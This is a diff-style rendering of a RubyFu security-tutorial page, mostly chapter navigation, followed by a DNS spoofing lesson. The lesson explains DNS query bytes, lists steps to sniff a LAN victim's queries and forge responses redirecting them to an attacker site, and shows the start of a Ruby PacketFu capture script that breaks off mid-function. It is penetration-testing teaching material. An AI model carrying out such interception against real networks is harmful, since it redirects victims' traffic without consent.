<li class="chapter " data-level="3.9" data-path="module_0x3__network_kung_fu/tns_enumeration.html">
|
|
590
|
+
|
|
591
|
+
|
|
592
|
+
<a href="../module_0x3__network_kung_fu/tns_enumeration.html">
|
|
593
|
+
|
|
594
|
+
<i class="fa fa-check"></i>
|
|
595
|
+
|
|
596
|
+
<b>3.9.</b>
|
|
597
|
+
|
|
598
|
+
Oracle TNS Enumeration
|
|
599
|
+
</a>
|
|
600
|
+
|
|
601
|
+
|
|
602
|
+
</li>
|
|
603
|
+
|
|
604
|
+
<li class="chapter " data-level="3.10" data-path="module_0x3__network_kung_fu/packet_manipulation.html">
|
|
605
|
+
|
|
606
|
+
|
|
607
|
+
<a href="../module_0x3__network_kung_fu/packet_manipulation.html">
|
|
608
|
+
|
|
609
|
+
<i class="fa fa-check"></i>
|
|
610
|
+
|
|
611
|
+
<b>3.10.</b>
|
|
612
|
+
|
|
613
|
+
Packet manipulation
|
|
614
|
+
</a>
|
|
615
|
+
|
|
616
|
+
|
|
617
|
+
<ul class="articles">
|
|
618
|
+
|
|
619
|
+
|
|
620
|
+
<li class="chapter " data-level="3.10.1" data-path="module_0x3__network_kung_fu/arp_spoofing.html">
|
|
621
|
+
|
|
622
|
+
|
|
623
|
+
<a href="../module_0x3__network_kung_fu/arp_spoofing.html">
|
|
624
|
+
|
|
625
|
+
<i class="fa fa-check"></i>
|
|
626
|
+
|
|
627
|
+
<b>3.10.1.</b>
|
|
628
|
+
|
|
629
|
+
ARP Spoofing
|
|
630
|
+
</a>
|
|
631
|
+
|
|
632
|
+
|
|
633
|
+
</li>
|
|
634
|
+
|
|
635
|
+
<li class="chapter active" data-level="3.10.2" data-path="module_0x3__network_kung_fu/dns_spoofing.html">
|
|
636
|
+
|
|
637
|
+
|
|
638
|
+
<a href="../module_0x3__network_kung_fu/dns_spoofing.html">
|
|
639
|
+
|
|
640
|
+
<i class="fa fa-check"></i>
|
|
641
|
+
|
|
642
|
+
<b>3.10.2.</b>
|
|
643
|
+
|
|
644
|
+
DNS Spoofing
|
|
645
|
+
</a>
|
|
646
|
+
|
|
647
|
+
|
|
648
|
+
</li>
|
|
649
|
+
|
|
650
|
+
|
|
651
|
+
</ul>
|
|
652
|
+
|
|
653
|
+
</li>
|
|
654
|
+
|
|
655
|
+
|
|
656
|
+
</ul>
|
|
657
|
+
|
|
658
|
+
</li>
|
|
659
|
+
|
|
660
|
+
<li class="chapter " data-level="4" data-path="module_0x4__web_kung_fu/index.html">
|
|
661
|
+
|
|
662
|
+
|
|
663
|
+
<a href="../module_0x4__web_kung_fu/index.html">
|
|
664
|
+
|
|
665
|
+
<i class="fa fa-check"></i>
|
|
666
|
+
|
|
667
|
+
<b>4.</b>
|
|
668
|
+
|
|
669
|
+
Module 0x4 | Web Kung Fu
|
|
670
|
+
</a>
|
|
671
|
+
|
|
672
|
+
|
|
673
|
+
<ul class="articles">
|
|
674
|
+
|
|
675
|
+
|
|
676
|
+
<li class="chapter " data-level="4.1" data-path="module_0x4__web_kung_fu/sql_injection_scanner.html">
|
|
677
|
+
|
|
678
|
+
|
|
679
|
+
<a href="../module_0x4__web_kung_fu/sql_injection_scanner.html">
|
|
680
|
+
|
|
681
|
+
<i class="fa fa-check"></i>
|
|
682
|
+
|
|
683
|
+
<b>4.1.</b>
|
|
684
|
+
|
|
685
|
+
SQL Injection Scanner
|
|
686
|
+
</a>
|
|
687
|
+
|
|
688
|
+
|
|
689
|
+
</li>
|
|
690
|
+
|
|
691
|
+
<li class="chapter " data-level="4.2" data-path="module_0x4__web_kung_fu/databases.html">
|
|
692
|
+
|
|
693
|
+
|
|
694
|
+
<a href="../module_0x4__web_kung_fu/databases.html">
|
|
695
|
+
|
|
696
|
+
<i class="fa fa-check"></i>
|
|
697
|
+
|
|
698
|
+
<b>4.2.</b>
|
|
699
|
+
|
|
700
|
+
Databases
|
|
701
|
+
</a>
|
|
702
|
+
|
|
703
|
+
|
|
704
|
+
</li>
|
|
705
|
+
|
|
706
|
+
<li class="chapter " data-level="4.3" data-path="module_0x4__web_kung_fu/extending_burpsuite.html">
|
|
707
|
+
|
|
708
|
+
|
|
709
|
+
<a href="../module_0x4__web_kung_fu/extending_burpsuite.html">
|
|
710
|
+
|
|
711
|
+
<i class="fa fa-check"></i>
|
|
712
|
+
|
|
713
|
+
<b>4.3.</b>
|
|
714
|
+
|
|
715
|
+
Extending Burp Suite
|
|
716
|
+
</a>
|
|
717
|
+
|
|
718
|
+
|
|
719
|
+
</li>
|
|
720
|
+
|
|
721
|
+
<li class="chapter " data-level="4.4" data-path="module_0x4__web_kung_fu/browser_manipulation.html">
|
|
722
|
+
|
|
723
|
+
|
|
724
|
+
<a href="../module_0x4__web_kung_fu/browser_manipulation.html">
|
|
725
|
+
|
|
726
|
+
<i class="fa fa-check"></i>
|
|
727
|
+
|
|
728
|
+
<b>4.4.</b>
|
|
729
|
+
|
|
730
|
+
Browser Manipulation
|
|
731
|
+
</a>
|
|
732
|
+
|
|
733
|
+
|
|
734
|
+
</li>
|
|
735
|
+
|
|
736
|
+
<li class="chapter " data-level="4.5" data-path="module_0x4__web_kung_fu/web_servcies_and_apis.html">
|
|
737
|
+
|
|
738
|
+
|
|
739
|
+
<a href="../module_0x4__web_kung_fu/web_servcies_and_apis.html">
|
|
740
|
+
|
|
741
|
+
<i class="fa fa-check"></i>
|
|
742
|
+
|
|
743
|
+
<b>4.5.</b>
|
|
744
|
+
|
|
745
|
+
Web Services and APIs
|
|
746
|
+
</a>
|
|
747
|
+
|
|
748
|
+
|
|
749
|
+
<ul class="articles">
|
|
750
|
+
|
|
751
|
+
|
|
752
|
+
<li class="chapter " data-level="4.5.1" data-path="module_0x4__web_kung_fu/web_services.html">
|
|
753
|
+
|
|
754
|
+
|
|
755
|
+
<a href="../module_0x4__web_kung_fu/web_services.html">
|
|
756
|
+
|
|
757
|
+
<i class="fa fa-check"></i>
|
|
758
|
+
|
|
759
|
+
<b>4.5.1.</b>
|
|
760
|
+
|
|
761
|
+
Interacting with Web Services
|
|
762
|
+
</a>
|
|
763
|
+
|
|
764
|
+
|
|
765
|
+
</li>
|
|
766
|
+
|
|
767
|
+
<li class="chapter " data-level="4.5.2" data-path="module_0x4__web_kung_fu/interacting_with_apis.html">
|
|
768
|
+
|
|
769
|
+
|
|
770
|
+
<a href="../module_0x4__web_kung_fu/interacting_with_apis.html">
|
|
771
|
+
|
|
772
|
+
<i class="fa fa-check"></i>
|
|
773
|
+
|
|
774
|
+
<b>4.5.2.</b>
|
|
775
|
+
|
|
776
|
+
Interacting with APIs
|
|
777
|
+
</a>
|
|
778
|
+
|
|
779
|
+
|
|
780
|
+
<ul class="articles">
|
|
781
|
+
|
|
782
|
+
|
|
783
|
+
<li class="chapter " data-level="4.5.2.1" data-path="module_0x4__web_kung_fu/wordpress_api.html">
|
|
784
|
+
|
|
785
|
+
|
|
786
|
+
<a href="../module_0x4__web_kung_fu/wordpress_api.html">
|
|
787
|
+
|
|
788
|
+
<i class="fa fa-check"></i>
|
|
789
|
+
|
|
790
|
+
<b>4.5.2.1.</b>
|
|
791
|
+
|
|
792
|
+
WordPress API
|
|
793
|
+
</a>
|
|
794
|
+
|
|
795
|
+
|
|
796
|
+
</li>
|
|
797
|
+
|
|
798
|
+
<li class="chapter " data-level="4.5.2.2" data-path="module_0x4__web_kung_fu/twitter_api.html">
|
|
799
|
+
|
|
800
|
+
|
|
801
|
+
<a href="../module_0x4__web_kung_fu/twitter_api.html">
|
|
802
|
+
|
|
803
|
+
<i class="fa fa-check"></i>
|
|
804
|
+
|
|
805
|
+
<b>4.5.2.2.</b>
|
|
806
|
+
|
|
807
|
+
Twitter API
|
|
808
|
+
</a>
|
|
809
|
+
|
|
810
|
+
|
|
811
|
+
</li>
|
|
812
|
+
|
|
813
|
+
|
|
814
|
+
</ul>
|
|
815
|
+
|
|
816
|
+
</li>
|
|
817
|
+
|
|
818
|
+
|
|
819
|
+
</ul>
|
|
820
|
+
|
|
821
|
+
</li>
|
|
822
|
+
|
|
823
|
+
<li class="chapter " data-level="4.6" data-path="module_0x4__web_kung_fu/ruby2javascript.html">
|
|
824
|
+
|
|
825
|
+
|
|
826
|
+
<a href="../module_0x4__web_kung_fu/ruby2javascript.html">
|
|
827
|
+
|
|
828
|
+
<i class="fa fa-check"></i>
|
|
829
|
+
|
|
830
|
+
<b>4.6.</b>
|
|
831
|
+
|
|
832
|
+
Ruby 2 JavaScript
|
|
833
|
+
</a>
|
|
834
|
+
|
|
835
|
+
|
|
836
|
+
</li>
|
|
837
|
+
|
|
838
|
+
<li class="chapter " data-level="4.7" data-path="module_0x4__web_kung_fu/web_server_and_proxy.html">
|
|
839
|
+
|
|
840
|
+
|
|
841
|
+
<a href="../module_0x4__web_kung_fu/web_server_and_proxy.html">
|
|
842
|
+
|
|
843
|
+
<i class="fa fa-check"></i>
|
|
844
|
+
|
|
845
|
+
<b>4.7.</b>
|
|
846
|
+
|
|
847
|
+
Web Server and Proxy
|
|
848
|
+
</a>
|
|
849
|
+
|
|
850
|
+
|
|
851
|
+
</li>
|
|
852
|
+
|
|
853
|
+
|
|
854
|
+
</ul>
|
|
855
|
+
|
|
856
|
+
</li>
|
|
857
|
+
|
|
858
|
+
<li class="chapter " data-level="5" data-path="module_0x5__exploitation_kung_fu/index.html">
|
|
859
|
+
|
|
860
|
+
|
|
861
|
+
<a href="../module_0x5__exploitation_kung_fu/index.html">
|
|
862
|
+
|
|
863
|
+
<i class="fa fa-check"></i>
|
|
864
|
+
|
|
865
|
+
<b>5.</b>
|
|
866
|
+
|
|
867
|
+
Module 0x5 | Exploitation Kung Fu
|
|
868
|
+
</a>
|
|
869
|
+
|
|
870
|
+
|
|
871
|
+
<ul class="articles">
|
|
872
|
+
|
|
873
|
+
|
|
874
|
+
<li class="chapter " data-level="5.1" data-path="module_0x5__exploitation_kung_fu/fuzzer.html">
|
|
875
|
+
|
|
876
|
+
|
|
877
|
+
<a href="../module_0x5__exploitation_kung_fu/fuzzer.html">
|
|
878
|
+
|
|
879
|
+
<i class="fa fa-check"></i>
|
|
880
|
+
|
|
881
|
+
<b>5.1.</b>
|
|
882
|
+
|
|
883
|
+
Fuzzer
|
|
884
|
+
</a>
|
|
885
|
+
|
|
886
|
+
|
|
887
|
+
</li>
|
|
888
|
+
|
|
889
|
+
<li class="chapter " data-level="5.2" data-path="module_0x5__exploitation_kung_fu/metasploit.html">
|
|
890
|
+
|
|
891
|
+
|
|
892
|
+
<a href="../module_0x5__exploitation_kung_fu/metasploit.html">
|
|
893
|
+
|
|
894
|
+
<i class="fa fa-check"></i>
|
|
895
|
+
|
|
896
|
+
<b>5.2.</b>
|
|
897
|
+
|
|
898
|
+
Metasploit
|
|
899
|
+
</a>
|
|
900
|
+
|
|
901
|
+
|
|
902
|
+
<ul class="articles">
|
|
903
|
+
|
|
904
|
+
|
|
905
|
+
<li class="chapter " data-level="5.2.1" data-path="module_0x5__exploitation_kung_fu/auxiliary_module.html">
|
|
906
|
+
|
|
907
|
+
|
|
908
|
+
<a href="../module_0x5__exploitation_kung_fu/auxiliary_module.html">
|
|
909
|
+
|
|
910
|
+
<i class="fa fa-check"></i>
|
|
911
|
+
|
|
912
|
+
<b>5.2.1.</b>
|
|
913
|
+
|
|
914
|
+
Auxiliary module
|
|
915
|
+
</a>
|
|
916
|
+
|
|
917
|
+
|
|
918
|
+
</li>
|
|
919
|
+
|
|
920
|
+
<li class="chapter " data-level="5.2.2" data-path="module_0x5__exploitation_kung_fu/exploit_module.html">
|
|
921
|
+
|
|
922
|
+
|
|
923
|
+
<a href="../module_0x5__exploitation_kung_fu/exploit_module.html">
|
|
924
|
+
|
|
925
|
+
<i class="fa fa-check"></i>
|
|
926
|
+
|
|
927
|
+
<b>5.2.2.</b>
|
|
928
|
+
|
|
929
|
+
Exploit module
|
|
930
|
+
</a>
|
|
931
|
+
|
|
932
|
+
|
|
933
|
+
</li>
|
|
934
|
+
|
|
935
|
+
<li class="chapter " data-level="5.2.3" data-path="module_0x5__exploitation_kung_fu/meterpreter.html">
|
|
936
|
+
|
|
937
|
+
|
|
938
|
+
<a href="../module_0x5__exploitation_kung_fu/meterpreter.html">
|
|
939
|
+
|
|
940
|
+
<i class="fa fa-check"></i>
|
|
941
|
+
|
|
942
|
+
<b>5.2.3.</b>
|
|
943
|
+
|
|
944
|
+
Meterpreter
|
|
945
|
+
</a>
|
|
946
|
+
|
|
947
|
+
|
|
948
|
+
<ul class="articles">
|
|
949
|
+
|
|
950
|
+
|
|
951
|
+
<li class="chapter " data-level="5.2.3.1" data-path="module_0x5__exploitation_kung_fu/extensions.html">
|
|
952
|
+
|
|
953
|
+
|
|
954
|
+
<a href="../module_0x5__exploitation_kung_fu/extensions.html">
|
|
955
|
+
|
|
956
|
+
<i class="fa fa-check"></i>
|
|
957
|
+
|
|
958
|
+
<b>5.2.3.1.</b>
|
|
959
|
+
|
|
960
|
+
API and Extensions
|
|
961
|
+
</a>
|
|
962
|
+
|
|
963
|
+
|
|
964
|
+
</li>
|
|
965
|
+
|
|
966
|
+
<li class="chapter " data-level="5.2.3.2" data-path="module_0x5__exploitation_kung_fu/meterpreter_scripting.html">
|
|
967
|
+
|
|
968
|
+
|
|
969
|
+
<a href="../module_0x5__exploitation_kung_fu/meterpreter_scripting.html">
|
|
970
|
+
|
|
971
|
+
<i class="fa fa-check"></i>
|
|
972
|
+
|
|
973
|
+
<b>5.2.3.2.</b>
|
|
974
|
+
|
|
975
|
+
Meterpreter Scripting
|
|
976
|
+
</a>
|
|
977
|
+
|
|
978
|
+
|
|
979
|
+
</li>
|
|
980
|
+
|
|
981
|
+
<li class="chapter " data-level="5.2.3.3" data-path="module_0x5__exploitation_kung_fu/railgun_api_extension.html">
|
|
982
|
+
|
|
983
|
+
|
|
984
|
+
<a href="../module_0x5__exploitation_kung_fu/railgun_api_extension.html">
|
|
985
|
+
|
|
986
|
+
<i class="fa fa-check"></i>
|
|
987
|
+
|
|
988
|
+
<b>5.2.3.3.</b>
|
|
989
|
+
|
|
990
|
+
Railgun API Extension
|
|
991
|
+
</a>
|
|
992
|
+
|
|
993
|
+
|
|
994
|
+
</li>
|
|
995
|
+
|
|
996
|
+
|
|
997
|
+
</ul>
|
|
998
|
+
|
|
999
|
+
</li>
|
|
1000
|
+
|
|
1001
|
+
|
|
1002
|
+
</ul>
|
|
1003
|
+
|
|
1004
|
+
</li>
|
|
1005
|
+
|
|
1006
|
+
<li class="chapter " data-level="5.3" data-path="module_0x5__exploitation_kung_fu/metasm.html">
|
|
1007
|
+
|
|
1008
|
+
|
|
1009
|
+
<a href="../module_0x5__exploitation_kung_fu/metasm.html">
|
|
1010
|
+
|
|
1011
|
+
<i class="fa fa-check"></i>
|
|
1012
|
+
|
|
1013
|
+
<b>5.3.</b>
|
|
1014
|
+
|
|
1015
|
+
metasm
|
|
1016
|
+
</a>
|
|
1017
|
+
|
|
1018
|
+
|
|
1019
|
+
</li>
|
|
1020
|
+
|
|
1021
|
+
|
|
1022
|
+
</ul>
|
|
1023
|
+
|
|
1024
|
+
</li>
|
|
1025
|
+
|
|
1026
|
+
<li class="chapter " data-level="6" data-path="module_0x6__forensic/index.html">
|
|
1027
|
+
|
|
1028
|
+
|
|
1029
|
+
<a href="../module_0x6__forensic/index.html">
|
|
1030
|
+
|
|
1031
|
+
<i class="fa fa-check"></i>
|
|
1032
|
+
|
|
1033
|
+
<b>6.</b>
|
|
1034
|
+
|
|
1035
|
+
Module 0x6 | Forensic Kung Fu
|
|
1036
|
+
</a>
|
|
1037
|
+
|
|
1038
|
+
|
|
1039
|
+
<ul class="articles">
|
|
1040
|
+
|
|
1041
|
+
|
|
1042
|
+
<li class="chapter " data-level="6.1" data-path="module_0x6__forensic/windows_forensic.html">
|
|
1043
|
+
|
|
1044
|
+
|
|
1045
|
+
<a href="../module_0x6__forensic/windows_forensic.html">
|
|
1046
|
+
|
|
1047
|
+
<i class="fa fa-check"></i>
|
|
1048
|
+
|
|
1049
|
+
<b>6.1.</b>
|
|
1050
|
+
|
|
1051
|
+
Windows Forensic
|
|
1052
|
+
</a>
|
|
1053
|
+
|
|
1054
|
+
|
|
1055
|
+
</li>
|
|
1056
|
+
|
|
1057
|
+
<li class="chapter " data-level="6.2" data-path="module_0x6__forensic/android_forensic.html">
|
|
1058
|
+
|
|
1059
|
+
|
|
1060
|
+
<a href="../module_0x6__forensic/android_forensic.html">
|
|
1061
|
+
|
|
1062
|
+
<i class="fa fa-check"></i>
|
|
1063
|
+
|
|
1064
|
+
<b>6.2.</b>
|
|
1065
|
+
|
|
1066
|
+
Android Forensic
|
|
1067
|
+
</a>
|
|
1068
|
+
|
|
1069
|
+
|
|
1070
|
+
</li>
|
|
1071
|
+
|
|
1072
|
+
<li class="chapter " data-level="6.3" data-path="module_0x3__network_kung_fu/network_traffic_analysis.html">
|
|
1073
|
+
|
|
1074
|
+
|
|
1075
|
+
<a href="../module_0x3__network_kung_fu/network_traffic_analysis.html">
|
|
1076
|
+
|
|
1077
|
+
<i class="fa fa-check"></i>
|
|
1078
|
+
|
|
1079
|
+
<b>6.3.</b>
|
|
1080
|
+
|
|
1081
|
+
Network Traffic Analysis
|
|
1082
|
+
</a>
|
|
1083
|
+
|
|
1084
|
+
|
|
1085
|
+
</li>
|
|
1086
|
+
|
|
1087
|
+
<li class="chapter " data-level="6.4" data-path="module_0x6__forensic/parsing_log_files.html">
|
|
1088
|
+
|
|
1089
|
+
|
|
1090
|
+
<a href="../module_0x6__forensic/parsing_log_files.html">
|
|
1091
|
+
|
|
1092
|
+
<i class="fa fa-check"></i>
|
|
1093
|
+
|
|
1094
|
+
<b>6.4.</b>
|
|
1095
|
+
|
|
1096
|
+
Parsing Log Files
|
|
1097
|
+
</a>
|
|
1098
|
+
|
|
1099
|
+
|
|
1100
|
+
</li>
|
|
1101
|
+
|
|
1102
|
+
|
|
1103
|
+
</ul>
|
|
1104
|
+
|
|
1105
|
+
</li>
|
|
1106
|
+
|
|
1107
|
+
<li class="chapter " data-level="7" data-path="references/index.html">
|
|
1108
|
+
|
|
1109
|
+
|
|
1110
|
+
<a href="../references/index.html">
|
|
1111
|
+
|
|
1112
|
+
<i class="fa fa-check"></i>
|
|
1113
|
+
|
|
1114
|
+
<b>7.</b>
|
|
1115
|
+
|
|
1116
|
+
References
|
|
1117
|
+
</a>
|
|
1118
|
+
|
|
1119
|
+
|
|
1120
|
+
</li>
|
|
1121
|
+
|
|
1122
|
+
<li class="chapter " data-level="8" data-path="faqs/index.html">
|
|
1123
|
+
|
|
1124
|
+
|
|
1125
|
+
<a href="../faqs/index.html">
|
|
1126
|
+
|
|
1127
|
+
<i class="fa fa-check"></i>
|
|
1128
|
+
|
|
1129
|
+
<b>8.</b>
|
|
1130
|
+
|
|
1131
|
+
FAQs
|
|
1132
|
+
</a>
|
|
1133
|
+
|
|
1134
|
+
|
|
1135
|
+
</li>
|
|
1136
|
+
|
|
1137
|
+
<li class="chapter " data-level="9" data-path="contributors/index.html">
|
|
1138
|
+
|
|
1139
|
+
|
|
1140
|
+
<a href="../contributors/index.html">
|
|
1141
|
+
|
|
1142
|
+
<i class="fa fa-check"></i>
|
|
1143
|
+
|
|
1144
|
+
<b>9.</b>
|
|
1145
|
+
|
|
1146
|
+
Contributors
|
|
1147
|
+
</a>
|
|
1148
|
+
|
|
1149
|
+
|
|
1150
|
+
<ul class="articles">
|
|
1151
|
+
|
|
1152
|
+
|
|
1153
|
+
<li class="chapter " data-level="9.1" data-path="contributors/todo.html">
|
|
1154
|
+
|
|
1155
|
+
|
|
1156
|
+
<a href="../contributors/todo.html">
|
|
1157
|
+
|
|
1158
|
+
<i class="fa fa-check"></i>
|
|
1159
|
+
|
|
1160
|
+
<b>9.1.</b>
|
|
1161
|
+
|
|
1162
|
+
TODO
|
|
1163
|
+
</a>
|
|
1164
|
+
|
|
1165
|
+
|
|
1166
|
+
</li>
|
|
1167
|
+
|
|
1168
|
+
|
|
1169
|
+
</ul>
|
|
1170
|
+
|
|
1171
|
+
</li>
|
|
1172
|
+
|
|
1173
|
+
|
|
1174
|
+
|
|
1175
|
+
|
|
1176
|
+
<li class="divider"></li>
|
|
1177
|
+
<li>
|
|
1178
|
+
<a href="https://www.gitbook.com" target="blank" class="gitbook-link">
|
|
1179
|
+
Published with GitBook
|
|
1180
|
+
</a>
|
|
1181
|
+
</li>
|
|
1182
|
+
|
|
1183
|
+
</ul>
|
|
1184
|
+
</nav>
|
|
1185
|
+
</div>
|
|
1186
|
+
|
|
1187
|
+
<div class="book-body">
|
|
1188
|
+
<div class="body-inner">
|
|
1189
|
+
<div class="book-header" role="navigation">
|
|
1190
|
+
<!-- Actions Left -->
|
|
1191
|
+
|
|
1192
|
+
|
|
1193
|
+
<!-- Title -->
|
|
1194
|
+
<h1>
|
|
1195
|
+
<i class="fa fa-circle-o-notch fa-spin"></i>
|
|
1196
|
+
<a href="../" >RubyFu</a>
|
|
1197
|
+
</h1>
|
|
1198
|
+
</div>
|
|
1199
|
+
|
|
1200
|
+
<div class="page-wrapper" tabindex="-1" role="main">
|
|
1201
|
+
<div class="page-inner">
|
|
1202
|
+
|
|
1203
|
+
|
|
1204
|
+
<section class="normal" id="section-">
|
|
1205
|
+
|
|
1206
|
+
<h1 id="dns-spoofing"><a name="dns-spoofing" class="plugin-anchor" href="#dns-spoofing"><span class="fa fa-link"></span></a>DNS Spoofing</h1>
|
|
1207
|
+
<p>Continuing our attack through <a href="module_0x4__network_kung_fu/arp_spoofing.md">ARP Spoofing</a>, we want to change the victim's DNS request to whatever destination we like.</p>
|
|
1208
|
+
<h3 id="scenario"><a name="scenario" class="plugin-anchor" href="#scenario"><span class="fa fa-link"></span></a>Scenario</h3>
|
|
1209
|
+
<pre><code> |Attacker|
|
|
1210
|
+
| AttackerSite
|
|
1211
|
+
٧ AttackerSite
|
|
1212
|
+
|Victim| ----------/ \----------> |Router| ----------> Internet
|
|
1213
|
+
AnySite AttackerSite
|
|
1214
|
+
</code></pre><blockquote>
|
|
1215
|
+
<p>Keep the ARP spoof attack running</p>
|
|
1216
|
+
</blockquote>
|
|
1217
|
+
<p>The same IPs of ARP spoof attack</p>
|
|
1218
|
+
<table>
|
|
1219
|
+
<thead>
|
|
1220
|
+
<tr>
|
|
1221
|
+
<th style="text-align:center">Host</th>
|
|
1222
|
+
<th style="text-align:center">IP Address</th>
|
|
1223
|
+
</tr>
|
|
1224
|
+
</thead>
|
|
1225
|
+
<tbody>
|
|
1226
|
+
<tr>
|
|
1227
|
+
<td style="text-align:center">Attacker</td>
|
|
1228
|
+
<td style="text-align:center">192.168.0.100</td>
|
|
1229
|
+
</tr>
|
|
1230
|
+
<tr>
|
|
1231
|
+
<td style="text-align:center">Victim</td>
|
|
1232
|
+
<td style="text-align:center">192.168.0.21</td>
|
|
1233
|
+
</tr>
|
|
1234
|
+
<tr>
|
|
1235
|
+
<td style="text-align:center">Router</td>
|
|
1236
|
+
<td style="text-align:center">192.168.0.1</td>
|
|
1237
|
+
</tr>
|
|
1238
|
+
</tbody>
|
|
1239
|
+
</table>
|
|
1240
|
+
<p>Now we cant intercept DNS Query packet coming from victim's machine. Since PacketFu supports filters in capturing (to reduce mount of captured packets) we'll use <code>udp and port 53 and host</code> filter, then we'll inspect the captured packet to ensure that it's a query then find the requested domain. <a href="../files/module03/dns_spoofing_dns-req_res.pcap.pcapng"><strong>Download DNS packet</strong></a>.</p>
|
|
1241
|
+
<p>From Wireshark, if we take a deeper look at the DNS query payload in <code>Domain Name System (query)</code>, we can see its been presented in hexadecimal format.</p>
|
|
1242
|
+
<table>
|
|
1243
|
+
<thead>
|
|
1244
|
+
<tr>
|
|
1245
|
+
<th style="text-align:center"><img src="../images/module03/dns_spoofing_wireshark1.png" alt="Wireshark"></th>
|
|
1246
|
+
</tr>
|
|
1247
|
+
</thead>
|
|
1248
|
+
<tbody>
|
|
1249
|
+
<tr>
|
|
1250
|
+
<td style="text-align:center"><strong>Figure 1.</strong> DNS query Payload</td>
|
|
1251
|
+
</tr>
|
|
1252
|
+
</tbody>
|
|
1253
|
+
</table>
|
|
1254
|
+
<p>Let's to anatomize our payload</p>
|
|
1255
|
+
<pre><code>0000 e7 1d 01 00 00 01 00 00 00 00 00 00 07 74 77 69
|
|
1256
|
+
0010 74 74 65 72 03 63 6f 6d 00 00 01 00 01
|
|
1257
|
+
</code></pre><ul>
|
|
1258
|
+
<li>The First 2 bytes is the <strong>Transaction ID</strong> and we don't care about it for now. (Our case: <code>\xe7\x1d</code>)</li>
|
|
1259
|
+
<li>The next 2 bytes is the <strong>Flags</strong><sup><a href="#fn_3" id="reffn_3">3</a></sup>. (We need: <code>\x01\x00</code> = \x10)</li>
|
|
1260
|
+
<li>Furthermore, in <strong>Queries</strong> section which contains</li>
|
|
1261
|
+
</ul>
|
|
1262
|
+
<pre><code>0000 07 74 77 69 74 74 65 72 03 63 6f 6d 00 00 01 00
|
|
1263
|
+
0010 01
|
|
1264
|
+
</code></pre><ul>
|
|
1265
|
+
<li><p>The <strong>Queries</strong> starts at <em>13 byte</em> of the payload.</p>
|
|
1266
|
+
<ul>
|
|
1267
|
+
<li><p>The 13th byte specifies the length of the domain name <em>before</em> the <em>very first dot</em> (without last dot com or whatever the top domain is). (Our case: <code>\x07</code>)
|
|
1268
|
+
<strong>Try:</strong><code>[%w{ 74 77 69 74 74 65 72 }.join].pack("H*")</code></p>
|
|
1269
|
+
<ul>
|
|
1270
|
+
<li>Notice The domain name of "twitter.com" equals <code>\x07</code> but "www.twitter.com" equals <code>\x03</code> the same consideration for subdomains</li>
|
|
1271
|
+
<li><p>Each dot after first dot will be replaced with the length of the followed characters</p>
|
|
1272
|
+
<p><strong>e.g.</strong> www.google.co.uk</p>
|
|
1273
|
+
<ul>
|
|
1274
|
+
<li>First length (<strong>www</strong>) => will be replaced with <code>\x03</code></li>
|
|
1275
|
+
<li>First dot(<strong>.google</strong>) => will be replaced with <code>\x06</code></li>
|
|
1276
|
+
<li>Second dot(<strong>.co</strong>) => will be replaced with <code>\x02</code></li>
|
|
1277
|
+
<li>Third dot(<strong>.uk</strong>) => will be replaced with <code>\x02</code></li>
|
|
1278
|
+
</ul>
|
|
1279
|
+
</li>
|
|
1280
|
+
</ul>
|
|
1281
|
+
</li>
|
|
1282
|
+
<li><p>The very end of the domain name string is terminated by a <code>\x00</code>.</p>
|
|
1283
|
+
</li>
|
|
1284
|
+
<li>The next 2 bytes refers to the <strong>type of the query</strong><sup><a href="#fn_4" id="reffn_4">4</a></sup>. (Our case: <code>\x00\x01</code>)</li>
|
|
1285
|
+
</ul>
|
|
1286
|
+
</li>
|
|
1287
|
+
</ul>
|
|
1288
|
+
<p><strong>Now what?!</strong></p>
|
|
1289
|
+
<ul>
|
|
1290
|
+
<li>We need to start capturing/sniffing on specific interface</li>
|
|
1291
|
+
<li>We need to enable promiscuous mode on our interface</li>
|
|
1292
|
+
<li>We need to capture UDP packets on port 53 only</li>
|
|
1293
|
+
<li>We need parse/analyze the valid UDP packets only</li>
|
|
1294
|
+
<li>We need to make sure this packet is a DNS query</li>
|
|
1295
|
+
<li>We need to get the queried/requested domain<ul>
|
|
1296
|
+
<li>We need to know the domain length</li>
|
|
1297
|
+
<li>We need to get the FQDN</li>
|
|
1298
|
+
</ul>
|
|
1299
|
+
</li>
|
|
1300
|
+
<li>Build a DNS response</li>
|
|
1301
|
+
<li>Replace the requested domain with any domain we want</li>
|
|
1302
|
+
<li>Re inject the packet into victim connection and send</li>
|
|
1303
|
+
</ul>
|
|
1304
|
+
<p>I'll divide our tasks then wrap it up in one script</p>
|
|
1305
|
+
<pre><code class="lang-ruby"><span class="hljs-comment">#!/usr/bin/env ruby</span>
|
|
1306
|
+
<span class="hljs-comment">#</span>
|
|
1307
|
+
<span class="hljs-keyword">require</span> <span class="hljs-string">'packetfu'</span>
|
|
1308
|
+
|
|
1309
|
+
<span class="hljs-keyword">include</span> <span class="hljs-constant">PacketFu</span>
|
|
1310
|
+
|
|
1311
|
+
<span class="hljs-comment">#</span>
|
|
1312
|
+
<span class="hljs-comment"># * We need to start capturing/sniffing on specific interface</span>
|
|
1313
|
+
<span class="hljs-comment"># * We need to enable promiscuous mode on our interface</span>
|
|
1314
|
+
<span class="hljs-comment"># * We need to capture UDP packets on port 53 only</span>
|
|
1315
|
+
<span class="hljs-comment">#</span>
|
|
1316
|
+
filter = <span class="hljs-string">"udp and port 53 and host "</span> + <span class="hljs-string">"192.168.0.21"</span>
|
|
1317
|
+
capture = <span class="hljs-constant">Capture</span>.new(<span class="hljs-symbol">:iface</span> => <span class="hljs-string">"wlan0"</span>,<span class="hljs-symbol">:start</span> => <span class="hljs-keyword">true</span>, <span class="hljs-symbol">:promisc</span> => <span class="hljs-keyword">true</span>, <span class="hljs-symbol">:filter</span> => filter, <span class="hljs-symbol">:save</span> => <span class="hljs-keyword">true</span>)
|
|
1318
|
+
|
|
1319
|
+
<span class="hljs-comment"># * We need to get the queried/requested domain</span>
|
|
1320
|
+
<span class="hljs-comment"># * We need to know the domain length</span>
|
|
1321
|
+
<span class="hljs-comment"># * We need to get the FQDN</span>
|
|
1322
|
+
<span class="hljs-comment">#</span>
|
|
1323
|
+
<span class="hljs-comment"># Convert DNS Payload to readable - Find The FQDN</span>
|
|
1324
|
+
<span class="hljs-comment">#</span>
|
|
1325
|
+
<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">readable</span><span class="hljs-params">(raw_domain)</span></span>
|
|
1326
|
+
<span class="hljs-comment"># Prevent processing non domain</span>
|
|
1327
|
+
<span class="hljs-keyword">if</span> raw_domain[<span class="hljs-number">0</span>].ord == <span class="hljs-number">0</span>
|
|
1328
|
